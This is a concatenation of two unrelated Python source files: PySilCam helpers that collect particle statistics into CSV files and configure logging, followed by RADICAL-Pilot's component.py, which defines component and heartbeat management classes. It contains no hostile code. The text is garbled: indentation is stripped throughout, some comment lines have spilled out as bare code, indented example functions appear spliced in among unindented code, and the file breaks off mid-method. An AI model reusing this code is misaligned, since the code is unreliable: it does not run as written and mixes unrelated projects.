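    settings = PySilcamSettings(config_filename)
    inputQueue, outputQueue = defineQueues(False, 4)
    proc_list = []
    distributor(inputQueue, outputQueue, config_filename, proc_list)
    # ... images are fed in with addToQueue(...) and periodically flushed:
    collector(inputQueue, outputQueue, datafilename, proc_list, False, settings)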
def collector(inputQueue, outputQueue, datafilename, proc_list, testInputQueue,
settings, rts=None):
'''
collects all the results and write them into the stats.csv file
Args:
inputQueue () : queue where the images are added for processing
initialised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initialised using defineQueues()
datafilename (str) : filename where processed data are written to csv
proc_list (list) : list of multiprocessing objects
testInputQueue (Bool) : if True function will keep collecting until inputQueue is empty
settings (PySilcamSettings) : Settings read from a .ini file
rts (Class): : Class for realtime stats
'''
countProcessFinished = 0
while ((outputQueue.qsize()>0) or (testInputQueue and inputQueue.qsize()>0)):
task = outputQueue.get()
if (task is None):
countProcessFinished = countProcessFinished + 1
if (len(proc_list) == 0): # no multiprocessing
break
# The collector can be stopped only after all loop processes are finished
elif (countProcessFinished == len(proc_list)):
break
continue
writeCSV(datafilename, task)
collect_rts(settings, rts, task)
def collect_rts(settings, rts, stats_all):
'''
Updater for realtime statistics
Args:
settings (PySilcamSettings) : Settings read from a .ini file
settings.Process.real_time_stats must exist
rts (Class) : Class for realtime stats
initialised using scog.rt_stats()
stats_all (DataFrame) : stats dataframe returned from processImage()
'''
if settings.Process.real_time_stats:
try:
rts.stats = rts.stats().append(stats_all)
except:
rts.stats = rts.stats.append(stats_all)
rts.update()
filename = os.path.join(settings.General.datafile,
'OilGasd50.csv')
rts.to_csv(filename)
def writeCSV(datafilename, stats_all):
'''
Writes particle stats into the csv output file
Args:
datafilename (str): filename prefix for -STATS.csv file that may or may not include a path
stats_all (DataFrame): stats dataframe returned from processImage()
'''
# create or append particle statistics to output file
# if the output file does not already exist, create it
# otherwise data will be appended
# @todo accidentally appending to an existing file could be dangerous
# because data will be duplicated (and concentrations would therefore
double). GUI prompts the user regarding this - directly-run functions are more dangerous.
if not os.path.isfile(datafilename + '-STATS.csv'):
stats_all.to_csv(datafilename +
'-STATS.csv', index_label='particle index')
else:
stats_all.to_csv(datafilename + '-STATS.csv',
mode='a', header=False)
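# Because writeCSV() appends rows without rewriting the header, the resulting
# <prefix>-STATS.csv can be read back as a single DataFrame. A minimal sketch
# (the path below is a placeholder):
def _example_read_stats(datafilename='out/data'):
    import pandas as pd
    stats = pd.read_csv(datafilename + '-STATS.csv', index_col=0)
    return stats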
def check_path(filename):
'''Check if a path exists, and create it if not
Args:
filename (str): filename that may or may not include a path
'''
file = os.path.normpath(filename)
path = os.path.dirname(file)
if path:
if not os.path.isdir(path):
try:
os.makedirs(path)
except OSError:
    print('Could not create directory:', path)
def configure_logger(settings):
'''Configure a logger according to the settings.
Args:
settings (PySilcamSettings): Settings read from a .ini file
settings.logfile is optional
settings.loglevel must exist
'''
if settings.logfile:
check_path(settings.logfile)
logging.basicConfig(filename=settings.logfile,
level=getattr(logging, settings.loglevel))
else:
logging.basicConfig(level=getattr(logging, settings.loglevel))
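# configure_logger() only needs `logfile` (optional) and `loglevel` from the
# General settings section. A hedged sketch using a stand-in namespace object
# instead of a full PySilcamSettings instance (paths are illustrative):
def _example_configure_logger():
    from types import SimpleNamespace
    general = SimpleNamespace(logfile='log/silcam.log', loglevel='INFO')
    configure_logger(general)
    logging.getLogger(__name__).info('logger configured')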
def updatePathLength(settings, logger):
'''Adjusts the path length of systems with the actuator installed and RS232
connected.
Args:
settings (PySilcamSettings): Settings read from a .ini file
settings.PostProcess.com_port and settings.PostProcess.path_length must exist
logger (logger object) : logger object created using
configure_logger()
'''
try:
logger.info('Updating path length')
pl = scog.PathLength(settings.PostProcess.com_port)
pl.gap_to_mm(settings.PostProcess.path_length)
pl.finish()
except:
logger.warning('Could not open port. Path length will not be adjusted.')
|
component.py
|
# pylint: disable=unused-argument # W0613 Unused argument 'timeout' & 'input'
# pylint: disable=redefined-builtin # W0622 Redefining built-in 'input'
import os
import sys
import copy
import time
import threading as mt
import radical.utils as ru
from .. import constants as rpc
from .. import states as rps
def out(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
# ------------------------------------------------------------------------------
#
class ComponentManager(object):
'''
RP spans a hierarchy of component instances: the application has a pmgr and
tmgr, and the tmgr has a staging component and a scheduling component, and
the pmgr has a launching component, and components also can have bridges,
etc. etc. This ComponentManager centralises the code needed to spawn,
manage and terminate such components - any code which needs to create
components should create a ComponentManager instance and pass the required
component and bridge layout and configuration. Calling `stop()` on the cmgr
will terminate the components and bridges.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg):
self._cfg = ru.Config('radical.pilot.cmgr', cfg=cfg)
self._sid = self._cfg.sid
self._uid = ru.generate_id('cmgr', ns=self._sid)
self._uids = [self._uid] # uids to track heartbeats for (incl. own)
self._prof = ru.Profiler(self._uid, ns='radical.pilot',
path=self._cfg.path)
self._log = ru.Logger(self._uid, ns='radical.pilot',
path=self._cfg.path)
self._prof.prof('init2', uid=self._uid, msg=self._cfg.path)
# Every ComponentManager runs a HB pubsub bridge in a separate thread.
# That HB channel should be used by all components and bridges created
# under this CMGR.
bcfg = ru.Config(cfg={'channel' : 'heartbeat',
'type' : 'pubsub',
'uid' : self._uid + '.hb',
'stall_hwm' : 1,
'bulk_size' : 0,
'path' : self._cfg.path})
self._hb_bridge = ru.zmq.PubSub(bcfg)
self._hb_bridge.start()
self._cfg.heartbeat.addr_pub = str(self._hb_bridge.addr_pub)
self._cfg.heartbeat.addr_sub = str(self._hb_bridge.addr_sub)
# runs a HB monitor on that channel
self._hb = ru.Heartbeat(uid=self.uid,
timeout=self._cfg.heartbeat.timeout,
interval=self._cfg.heartbeat.interval,
beat_cb=self._hb_beat_cb, # on every heartbeat
term_cb=self._hb_term_cb, # on termination
log=self._log)
self._hb_pub = ru.zmq.Publisher('heartbeat',
self._cfg.heartbeat.addr_pub,
log=self._log, prof=self._prof)
self._hb_sub = ru.zmq.Subscriber('heartbeat',
self._cfg.heartbeat.addr_sub,
topic='heartbeat', cb=self._hb_sub_cb,
log=self._log, prof=self._prof)
# confirm the bridge being usable by listening to our own heartbeat
self._hb.start()
self._hb.wait_startup(self._uid, self._cfg.heartbeat.timeout)
self._log.info('heartbeat system up')
# --------------------------------------------------------------------------
#
def _hb_sub_cb(self, topic, msg):
'''
keep track of heartbeats for all bridges/components we know
'''
# self._log.debug('hb_sub %s: get %s check', self.uid, msg['uid'])
if msg['uid'] in self._uids:
# self._log.debug('hb_sub %s: get %s used', self.uid, msg['uid'])
self._hb.beat(uid=msg['uid'])
# --------------------------------------------------------------------------
#
def _hb_beat_cb(self):
'''
publish own heartbeat on the hb channel
'''
self._hb_pub.put('heartbeat', msg={'uid' : self.uid})
# self._log.debug('hb_cb %s: put %s', self.uid, self.uid)
# --------------------------------------------------------------------------
#
def _hb_term_cb(self, uid=None):
self._log.debug('hb_term %s: %s died', self.uid, uid)
self._prof.prof('term', uid=self._uid)
# FIXME: restart goes here
# NOTE: returning `False` indicates failure to recover. The HB will
# terminate and suicidally kill the very process it is living in.
# Make sure all required cleanup is done at this point!
return None
# --------------------------------------------------------------------------
#
@property
def uid(self):
return self._uid
# --------------------------------------------------------------------------
#
@property
def cfg(self):
return self._cfg
# --------------------------------------------------------------------------
#
def start_bridges(self, cfg=None):
'''
check if any bridges are defined under `cfg['bridges']` and start them
'''
self._prof.prof('start_bridges_start', uid=self._uid)
timeout = self._cfg.heartbeat.timeout
if cfg is None:
cfg = self._cfg
for bname, bcfg in cfg.get('bridges', {}).items():
bcfg.uid = bname
bcfg.channel = bname
bcfg.cmgr = self.uid
bcfg.sid = cfg.sid
bcfg.path = cfg.path
bcfg.heartbeat = cfg.heartbeat
fname = '%s/%s.json' % (cfg.path, bcfg.uid)
bcfg.write(fname)
self._log.info('create bridge %s [%s]', bname, bcfg.uid)
out, err, ret = ru.sh_callout('radical-pilot-bridge %s' % fname)
self._log.debug('bridge startup out: %s', out)
self._log.debug('bridge startup err: %s', err)
if ret:
raise RuntimeError('bridge startup failed')
self._uids.append(bcfg.uid)
self._log.info('created bridge %s [%s]', bname, bcfg.uid)
# all bridges should start now, for their heartbeats
# to appear.
# self._log.debug('wait for %s', self._uids)
failed = self._hb.wait_startup(self._uids, timeout=timeout)
# self._log.debug('waited for %s: %s', self._uids, failed)
if failed:
raise RuntimeError('could not start all bridges %s' % failed)
self._prof.prof('start_bridges_stop', uid=self._uid)
# --------------------------------------------------------------------------
#
def start_components(self, cfg=None):
'''
check if any components are defined under `cfg['components']`
and start them
'''
self._prof.prof('start_components_start', uid=self._uid)
timeout = self._cfg.heartbeat.timeout
if cfg is None:
cfg = self._cfg
# we pass a copy of the complete session config to all components, but
# merge it into the component specific config settings (no overwrite),
# and then remove the `bridges` and `components` sections
#
scfg = ru.Config(cfg=cfg)
if 'bridges' in scfg: del(scfg['bridges'])
if 'components' in scfg: del(scfg['components'])
for cname, ccfg in cfg.get('components', {}).items():
for _ in range(ccfg.get('count', 1)):
ccfg.uid = ru.generate_id(cname, ns=self._sid)
ccfg.cmgr = self.uid
ccfg.kind = cname
ccfg.sid = cfg.sid
ccfg.base = cfg.base
ccfg.path = cfg.path
ccfg.heartbeat = cfg.heartbeat
ccfg.merge(scfg, policy=ru.PRESERVE, log=self._log)
fname = '%s/%s.json' % (cfg.path, ccfg.uid)
ccfg.write(fname)
self._log.info('create component %s [%s]', cname, ccfg.uid)
out, err, ret = ru.sh_callout('radical-pilot-component %s' % fname)
self._log.debug('out: %s' , out)
self._log.debug('err: %s' , err)
if ret:
raise RuntimeError('component startup failed')
self._uids.append(ccfg.uid)
self._log.info('created component %s [%s]', cname, ccfg.uid)
# all components should start now, for their heartbeats
# to appear.
failed = self._hb.wait_startup(self._uids, timeout=timeout * 10)
if failed:
raise RuntimeError('could not start all components %s' % failed)
self._prof.prof('start_components_stop', uid=self._uid)
# --------------------------------------------------------------------------
#
def close(self):
self._prof.prof('close', uid=self._uid)
self._hb_bridge.stop()
self._hb.stop()
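# A hedged usage sketch of the ComponentManager lifecycle described above:
# build it from a session config, start the bridges and components listed in
# that config, and close it when done. The cfg content is assumed to carry
# sid, path and heartbeat settings as required by the constructor.
def _example_cmgr_lifecycle(cfg):
    cmgr = ComponentManager(cfg)     # starts the heartbeat pubsub bridge
    cmgr.start_bridges()             # spawns bridges from cfg['bridges']
    cmgr.start_components()          # spawns components from cfg['components']
    # ... run the session ...
    cmgr.close()                     # stops heartbeat monitoring and the bridge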
# ------------------------------------------------------------------------------
#
class Component(object):
'''
This class provides the basic structure for any RP component which operates
on stateful things. It provides means to:
- define input channels on which to receive new things in certain states
- define work methods which operate on the things to advance their state
- define output channels to which to send the things after working on them
- define notification channels over which messages with other components
can be exchanged (publish/subscriber channels)
All low level communication is handled by the base class -- deriving classes
will register the respective channels, valid state transitions, and work
methods. When a 'thing' is received, the component is assumed to have full
ownership over it, and that no other component will change the 'thing's
state during that time.
The main event loop of the component -- `work()` -- is executed on `run()`
and will not terminate on its own, unless it encounters a fatal error.
Components inheriting this class should attempt not to use shared
resources. That will ensure that multiple instances of the component can
coexist for higher overall system throughput. Should access to shared
resources be necessary, it will require some locking mechanism across
process boundaries.
This approach should ensure that
- 'thing's are always in a well defined state;
- components are simple and focus on the semantics of 'thing' state
progression;
- no state races can occur on 'thing' state progression;
- only valid state transitions can be enacted (given correct declaration
of the component's semantics);
- the overall system is performant and scalable.
Inheriting classes SHOULD overload the following methods:
- `initialize()`:
- set up the component state for operation
- register input/output/notification channels
- register work methods
- register callbacks to be invoked on state notification
- the component will terminate if this method raises an exception.
- `work()`
- called in the main loop of the component process, on all entities
arriving on input channels. The component will *not* terminate if
this method raises an exception. For termination, `terminate()` must
be called.
- `finalize()`
- tear down the component (close threads, unregister resources, etc).
Inheriting classes MUST call the constructor:
class StagingComponent(rpu.Component):
def __init__(self, cfg, session):
rpu.Component.__init__(self, cfg, session)
A component thus must be passed a configuration (either as a path pointing
to a file name to be opened as `ru.Config`, or as a pre-populated
`ru.Config` instance). That config MUST contain a session ID (`sid`) for
the session under which to run this component, and a uid for the component
itself which MUST be unique within the scope of the given session. It MUST
further contain information about the session's heartbeat ZMQ pubsub channel
(`hb_pub`, `hb_sub`) on which heartbeats are sent and received for lifetime
management. All components and the session will continuously send
heartbeat messages on that channel - missing heartbeats will by default lead
to session termination.
The config MAY contain `bridges` and `components` sections. If those exist,
the component will start the communication bridges and the components
specified therein, and is then considered an owner of those components and
bridges. As such, it must watch the HB channel for heartbeats from those
components, and must terminate itself if those go AWOL.
Further, the class must implement the registered work methods, with
a signature of:
work(self, things)
The method is expected to change the state of the 'thing's given. 'Thing's
will not be pushed to outgoing channels automatically -- to do so, the work
method has to call (see call documentation for other options):
self.advance(thing)
Until that method is called, the component is considered the sole owner of
the 'thing's. After that method is called, the 'thing's are considered
disowned by the component. If, however, components return from the work
methods without calling advance on the given 'thing's, then the component
keeps ownership of the 'thing's to advance it asynchronously at a later
point in time. That implies that a component can collect ownership over an
arbitrary number of 'thing's over time, and they can be advanced at the
component's discretion.
The component process is a stand-alone daemon process which runs outside of
Python's multiprocessing domain. As such, it can freely use Python's
multithreading (and it extensively does so by default) - but developers
should be aware that spawning additional *processes* in this component is
discouraged, as Python's process management does not play well with its
multithreading implementation.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
'''
This constructor MUST be called by inheriting classes, as it specifies
the operation mode of the component: components can spawn a child
process, or not.
If a child will be spawned later, then the child process state can be
initialized by overloading the `initialize()` method.
Note that this policy should be strictly followed by all derived
classes, as we will otherwise carry state over the process fork. That
can become nasty if the state included any form of locking (like locks used
for profiling or logging).
The symmetric teardown methods are called `finalize()`.
Constructors of inheriting components *may* call start() in their
constructor.
'''
# NOTE: a fork will not duplicate any threads of the parent process --
# but it will duplicate any locks which are shared between the
# parent process and its threads -- and those locks might be in
# any state at this point. As such, each child has to make
# sure to never, ever, use any of the inherited locks, but instead
to create its own set of locks in self.initialize.
self._cfg = cfg
self._uid = cfg.uid
self._session = session
# we always need an UID
assert(self._uid), 'Component needs a uid (%s)' % type(self)
# state we carry over the fork
self._debug = cfg.get('debug')
self._owner = cfg.get('owner', self.uid)
self._ctype = "%s.%s" % (self.__class__.__module__,
self.__class__.__name__)
self._number = cfg.get('number', 0)
self._name = cfg.get('name.%s' % self._number,
'%s.%s' % (self._ctype, self._number))
self._bridges = list() # communication bridges
self._components = list() # sub-components
self._inputs = dict() # queues to get things from
self._outputs = dict() # queues to send things to
self._workers = dict() # methods to work on things
self._publishers = dict() # channels to send notifications to
self._threads = dict() # subscriber and idler threads
self._cb_lock = ru.RLock('%s.cb_lock' % self._uid)
# guard threaded callback invocations
self._work_lock = ru.RLock('%s.work_lock' % self._uid)
# guard threaded callback invocations
self._subscribers = dict() # ZMQ Subscriber classes
if self._owner == self.uid:
self._owner = 'root'
self._prof = self._session._get_profiler(name=self.uid)
self._rep = self._session._get_reporter(name=self.uid)
self._log = self._session._get_logger (name=self.uid,
level=self._debug)
# self._prof.register_timing(name='component_lifetime',
# scope='uid=%s' % self.uid,
# start='component_start',
# stop='component_stop')
# self._prof.register_timing(name='entity_runtime',
# scope='entity',
# start='get',
# stop=['put', 'drop'])
self._prof.prof('init1', uid=self._uid, msg=self._prof.path)
self._q = None
self._in = None
self._out = None
self._poll = None
self._ctx = None
self._thread = None
self._term = mt.Event()
# --------------------------------------------------------------------------
#
def start(self):
sync = mt.Event()
self._thread = mt.Thread(target=self._worker_thread, args=[sync])
self._thread.daemon = True
self._thread.start()
while not sync.is_set():
if not self._thread.is_alive():
raise RuntimeError('worker thread died during initialization')
time.sleep(0.1)
assert(self._thread.is_alive())
# --------------------------------------------------------------------------
#
def _worker_thread(self, sync):
try:
self._initialize()
except Exception:
self._log.exception('worker thread initialization failed')
return
sync.set()
while not self._term.is_set():
try:
ret = self.work_cb()
if not ret:
break
except:
self._log.exception('work cb error [ignored]')
try:
self._finalize()
except Exception:
self._log.exception('worker thread finalization failed')
# --------------------------------------------------------------------------
#
@staticmethod
def create(cfg, session):
# TODO: We keep this static typemap for component startup. The map
# should really be derived from rp module inspection via an
# `ru.PluginManager`.
#
from radical.pilot import worker as rpw
from radical.pilot import pmgr as rppm
from radical.pilot import tmgr as rptm
from radical.pilot import agent as rpa
from radical.pilot import raptor as rpt
# from radical.pilot import constants as rpc
comp = {
rpc.WORKER : rpt.Worker,
rpc.UPDATE_WORKER : rpw.Update,
rpc.STAGER_WORKER : rpw.Stager,
rpc.PMGR_LAUNCHING_COMPONENT : rppm.Launching,
rpc.TMGR_STAGING_INPUT_COMPONENT : rptm.Input,
rpc.TMGR_SCHEDULING_COMPONENT : rptm.Scheduler,
rpc.TMGR_STAGING_OUTPUT_COMPONENT : rptm.Output,
rpc.AGENT_STAGING_INPUT_COMPONENT : rpa.Input,
rpc.AGENT_SCHEDULING_COMPONENT : rpa.Scheduler,
rpc.AGENT_EXECUTING_COMPONENT : rpa.Executing,
rpc.AGENT_STAGING_OUTPUT_COMPONENT : rpa.Output
}
assert(cfg.kind in comp), '%s not in %s' % (cfg.kind, list(comp.keys()))
return comp[cfg.kind].create(cfg, session)
# --------------------------------------------------------------------------
#
def __str__(self):
return "%s <%s> [%s]" % (self.uid, self.__class__.__name__, self._owner)
# --------------------------------------------------------------------------
#
def _cancel_monitor_cb(self, topic, msg):
'''
We listen on the control channel for cancel requests, and append any
found UIDs to our cancel list.
'''
# FIXME: We do not check for types of things to cancel - the UIDs are
# supposed to be unique. That abstraction however breaks as we
# currently have no abstract 'cancel' command, but instead use
# 'cancel_tasks'.
self._log.debug('command incoming: %s', msg)
cmd = msg['cmd']
arg = msg['arg']
if cmd == 'cancel_tasks':
uids = arg['uids']
if not isinstance(uids, list):
uids = [uids]
self._log.debug('register for cancellation: %s', uids)
with self._cancel_lock:
self._cancel_list += uids
if cmd == 'terminate':
self._log.info('got termination command')
self.stop()
else:
self._log.debug('command ignored: %s', cmd)
return True
# --------------------------------------------------------------------------
#
@property
def cfg(self):
return copy.deepcopy(self._cfg)
@property
def session(self):
return self._session
@property
def uid(self):
return self._uid
@property
def ctype(self):
return self._ctype
# --------------------------------------------------------------------------
#
def _initialize(self):
'''
initialization of component base class goes here
'''
# components can always publish logs, state updates and control messages
# self.register_publisher(rpc.LOG_PUBSUB)
self.register_publisher(rpc.STATE_PUBSUB)
self.register_publisher(rpc.CONTROL_PUBSUB)
# set controller callback to handle cancellation requests
self._cancel_list = list()
self._cancel_lock = ru.RLock('%s.cancel_lock' % self._uid)
self.register_subscriber(rpc.CONTROL_PUBSUB, self._cancel_monitor_cb)
# call component level initialize
self.initialize()
self._prof.prof('component_init')
def initialize(self):
pass # can be overloaded
# --------------------------------------------------------------------------
#
def _finalize(self):
self._log.debug('_finalize()')
# call component level finalize, before we tear down channels
self.finalize()
for thread in self._threads.values():
thread.stop()
self._log.debug('%s close prof', self.uid)
try:
self._prof.prof('component_final')
self._prof.flush()
self._prof.close()
except Exception:
pass
def finalize(self):
pass # can be overloaded
# --------------------------------------------------------------------------
#
def stop(self, timeout=None): # noqa
'''
We need to terminate and join all threads, close all communication
channels, etc. But we trust on the correct invocation of the finalizers
to do all this, and thus here only forward the stop request to the base
class.
'''
# FIXME: implement timeout, or remove parameter
# (pylint W0613 should be removed if changes to timeout are applied)
self._log.info('stop %s (%s : %s) [%s]', self.uid, os.getpid(),
ru.get_thread_name(), ru.get_caller_name())
self._term.set()
# --------------------------------------------------------------------------
#
def register_input(self, states, input, worker=None):
'''
Using this method, the component can be connected to a queue on which
things are received to be worked upon. The given set of states (which
can be a single state or a list of states) will trigger an assert check
upon thing arrival.
This method will further associate a thing state with a specific worker.
Upon thing arrival, the thing state will be used to lookup the
respective worker, and the thing will be handed over. Workers should
call self.advance(thing), in order to push the thing toward the next
component. If, for some reason, that is not possible before the worker
returns, the component will retain ownership of the thing, and should
call advance() asynchronously at a later point in time.
Worker invocation is synchronous, ie. the main event loop will only
check for the next thing once the worker method returns.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
name = '%s.%s.%s' % (self.uid, worker.__name__,
'_'.join([str(s) for s in states]))
if name in self._inputs:
raise ValueError('input %s already registered' % name)
self._inputs[name] = {'queue' : self.get_input_ep(input),
'states' : states}
self._log.debug('registered input %s', name)
# we want exactly one worker associated with a state -- but a worker
# can be responsible for multiple states
for state in states:
self._log.debug('%s register input %s: %s', self.uid, state, name)
if state in self._workers:
self._log.warn("%s replaces worker %s (%s)"
% (self.uid, self._workers[state], state))
self._workers[state] = worker
self._log.debug('registered worker %s [%s]', worker.__name__, state)
# --------------------------------------------------------------------------
#
def unregister_input(self, states, input, worker):
'''
This method is the inverse of the 'register_input()' method.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
name = '%s.%s.%s' % (self.uid, worker.__name__,
'_'.join([str(s) for s in states]))
if name not in self._inputs:
self._log.warn('input %s not registered', name)
return
self._inputs[name]['queue'].stop()
del(self._inputs[name])
self._log.debug('unregistered input %s', name)
for state in states:
self._log.debug('%s unregister input %s (%s)', self.uid, name, state)
if state not in self._workers:
self._log.warn('%s input %s unknown', worker.__name__, state)
continue
del(self._workers[state])
# --------------------------------------------------------------------------
#
def register_output(self, states, output):
'''
Using this method, the component can be connected to a queue to which
things are sent after being worked upon. The given set of states (which
can be a single state or a list of states) will trigger an assert check
upon thing departure.
If a state but no output is specified, we assume that the state is
final, and the thing is then considered 'dropped' on calling advance() on
it. The advance() will trigger a state notification though, and then
mark the drop in the log. No other component should ever again work on
such a final thing. It is the responsibility of the component to make
sure that the thing is in fact in a final state.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
for state in states:
self._log.debug('%s register output %s:%s', self.uid, state, output)
# we want a *unique* output queue for each state.
if state in self._outputs:
self._log.warn("%s replaces output for %s : %s -> %s"
% (self.uid, state, self._outputs[state], output))
if not output:
# this indicates a final state
self._log.debug('%s register output to None %s', self.uid, state)
self._outputs[state] = None
else:
# non-final state, ie. we want a queue to push to:
self._outputs[state] = self.get_output_ep(output)
# --------------------------------------------------------------------------
#
def get_input_ep(self, input):
'''
return an input endpoint
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, input)
cfg = ru.read_json(fname)
return ru.zmq.Getter(input, url=cfg['get'])
# --------------------------------------------------------------------------
#
def get_output_ep(self, output):
'''
return an output endpoint
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, output)
cfg = ru.read_json(fname)
return ru.zmq.Putter(output, url=cfg['put'])
# --------------------------------------------------------------------------
#
def unregister_output(self, states):
'''
this removes any outputs registered for the given states.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
for state in states:
self._log.debug('TERM : %s unregister output %s', self.uid, state)
if state not in self._outputs:
self._log.warn('state %s has no output registered', state)
# raise ValueError('state %s has no output registered' % state)
continue
del(self._outputs[state])
self._log.debug('unregistered output for %s', state)
# --------------------------------------------------------------------------
#
def output(self, things, state=None):
'''
this pushes the given things to the output queue registered for the given
state
'''
# NOTE: we do not check if things are actually in the given state
things = ru.as_list(things)
if not things:
# nothing to do
return
if state not in self._outputs:
raise ValueError('state %s has no output registered' % state)
if self._outputs[state]:
# the bridge will sort things into bulks, with bulk size depending on
# bridge configuration
self._outputs[state].put(things)
# --------------------------------------------------------------------------
#
def register_timed_cb(self, cb, cb_data=None, timer=None):
'''
Idle callbacks are invoked at regular intervals -- they are guaranteed
to *not* be called more frequently than 'timer' seconds, no promise is
made on a minimal call frequency. The intent for these callbacks is to
run lightweight work in semi-regular intervals.
'''
name = "%s.idler.%s" % (self.uid, cb.__name__)
self._log.debug('START: %s register idler %s', self.uid, name)
with self._cb_lock:
if name in self._threads:
raise ValueError('cb %s already registered' % cb.__name__)
if timer is None: timer = 0.0 # NOTE: busy idle loop
else : timer = float(timer)
# create a separate thread per idle cb, and let it be watched by the
# ru.Process base class
#
# ------------------------------------------------------------------
# NOTE: idle timing is a tricky beast: if we sleep for too long,
# then we have to wait that long on stop() for the thread to
# get active again and terminate/join. So we always sleep
# just a little, and explicitly check if sufficient time has
# passed to activate the callback.
class Idler(mt.Thread):
# --------------------------------------------------------------
def __init__(self, name, log, timer, cb, cb_data, cb_lock):
self._name = name
self._log = log
self._timeout = timer
self._cb = cb
self._cb_data = cb_data
self._cb_lock = cb_lock
self._last = 0.0
self._term = mt.Event()
super(Idler, self).__init__()
self.daemon = True
self.start()
def stop(self):
self._term.set()
def run(self):
try:
self._log.debug('start idle thread: %s', self._cb)
ret = True
while ret and not self._term.is_set():
if self._timeout and \
self._timeout > (time.time() - self._last):
# not yet
time.sleep(0.1) # FIXME: make configurable
continue
with self._cb_lock:
if self._cb_data is not None:
ret = self._cb(cb_data=self._cb_data)
else:
ret = self._cb()
if self._timeout:
self._last = time.time()
except:
self._log.exception('idle thread failed: %s', self._cb)
# ------------------------------------------------------------------
idler = Idler(name=name, timer=timer, log=self._log,
cb=cb, cb_data=cb_data, cb_lock=self._cb_lock)
self._threads[name] = idler
self._log.debug('%s registered idler %s', self.uid, name)
# --------------------------------------------------------------------------
#
def unregister_timed_cb(self, cb):
'''
This method reverts the register_timed_cb() above: it
removes an idler from the component, and will terminate the
respective thread.
'''
name = "%s.idler.%s" % (self.uid, cb.__name__)
self._log.debug('TERM : %s unregister idler %s', self.uid, name)
with self._cb_lock:
if name not in self._threads:
self._log.warn('timed cb %s is not registered', name)
# raise ValueError('%s is not registered' % name)
return
self._threads[name].stop() # implies join
del(self._threads[name])
self._log.debug("TERM : %s unregistered idler %s", self.uid, name)
# --------------------------------------------------------------------------
#
def register_publisher(self, pubsub):
'''
Using this method, the component can register itself as a publisher
of notifications on the given pubsub channel.
'''
assert(pubsub not in self._publishers)
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, pubsub)
cfg = ru.read_json(fname)
self._publishers[pubsub] = ru.zmq.Publisher(channel=pubsub,
url=cfg['pub'],
log=self._log,
prof=self._prof)
self._log.debug('registered publisher for %s', pubsub)
# --------------------------------------------------------------------------
#
def register_subscriber(self, pubsub, cb):
'''
This method is complementary to the register_publisher() above: it
registers a subscription to a pubsub channel. If a notification
is received on that channel, the registered callback will be
invoked. The callback MUST have the signature:
callback(topic, msg)
where 'topic' is set to the name of the pubsub channel.
The subscription will be handled in a separate thread, which implies
that the callback invocation will also happen in that thread. It is the
caller's responsibility to ensure thread safety during callback
invocation.
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, pubsub)
cfg = ru.read_json(fname)
if pubsub not in self._subscribers:
self._subscribers[pubsub] = ru.zmq.Subscriber(channel=pubsub,
url=cfg['sub'],
log=self._log,
prof=self._prof)
self._subscribers[pubsub].subscribe(topic=pubsub, cb=cb,
lock=self._cb_lock)
# --------------------------------------------------------------------------
#
def work_cb(self):
'''
This is the main routine of the component, as it runs in the component
process. It will first initialize the component in the process context.
Then it will attempt to get new things from all input queues
(round-robin). For each thing received, it will route that thing to the
respective worker method. Once the thing is worked upon, the next
attempt on getting a thing is up.
'''
# if there is nothing to check, idle a bit
if not self._inputs:
time.sleep(0.1)
return True
for name in self._inputs:
input = self._inputs[name]['queue']
states = self._inputs[name]['states']
# FIXME: a simple, 1-thing caching mechanism would likely
# remove the req/res overhead completely (for any
# non-trivial worker).
things = input.get_nowait(500) # in microseconds
things = ru.as_list(things)
if not things:
# return to have a chance to catch term signals
return True
# the worker target depends on the state of things, so we
# need to sort the things into buckets by state before
# pushing them
buckets = dict()
for thing in things:
state = thing.get('state') # can be stateless
uid = thing.get('uid') # and not have uids
self._prof.prof('get', uid=uid, state=state)
if state not in buckets:
buckets[state] = list()
buckets[state].append(thing)
# We now can push bulks of things to the workers
for state,things in buckets.items():
assert(state in states), 'cannot handle state %s' % state
assert(state in self._workers), 'no worker for state %s' % state
try:
to_cancel = list()
for thing in things:
uid = thing.get('uid')
# FIXME: this can become expensive over time
# if the cancel list is never cleaned
if uid and uid in self._cancel_list:
with self._cancel_lock:
self._cancel_list.remove(uid)
to_cancel.append(thing)
self._log.debug('got %s (%s)', uid, state)
if to_cancel:
# only advance stateful entities, otherwise just drop
if state:
self.advance(to_cancel, rps.CANCELED, publish=True,
push=False)
with self._work_lock:
self._workers[state](things)
except Exception:
# this is not fatal -- only the 'things' fail, not
# the component
self._log.exception("work %s failed", self._workers[state])
if state:
self.advance(things, rps.FAILED, publish=True,
push=False)
# keep work_cb registered
return True
# --------------------------------------------------------------------------
#
def advance(self, things, state=None, publish=True, push=False, ts=None,
prof=True):
'''
Things which have been operated upon are pushed down into the queues
again, only to be picked up by the next component, according to their
state model. This method will update the thing state, and push it into
the output queue registered as target for that state.
things: list of things to advance
state: new state to set for the things
publish: determine if state update notifications should be issued
push: determine if things should be pushed to outputs
prof: determine if state advance creates a profile event
(publish, and push are always profiled)
'Things' are expected to be a dictionary, and to have 'state', 'uid' and
optionally 'type' set.
If 'thing' contains an '$all' key, the complete dict is published;
otherwise, *only the state* is published.
This is evaluated in self.publish.
'''
if not things:
return
if not ts:
ts = time.time()
things = ru.as_list(things)
self._log.debug('advance bulk: %s [%s, %s]', len(things), push, publish)
# assign state, sort things by state
buckets = dict()
for thing in things:
uid = thing['uid']
# if thing['type'] not in ['task', 'pilot']:
# raise TypeError("thing has unknown type (%s)" % uid)
if state:
# state advance done here
thing['state'] = state
_state = thing['state']
if prof:
self._prof.prof('advance', uid=uid, state=_state, ts=ts)
if _state not in buckets:
buckets[_state] = list()
buckets[_state].append(thing)
# should we publish state information on the state pubsub?
if publish:
to_publish = list()
# If '$all' is set, we update the complete thing_dict.
# Things in final state are also published in full.
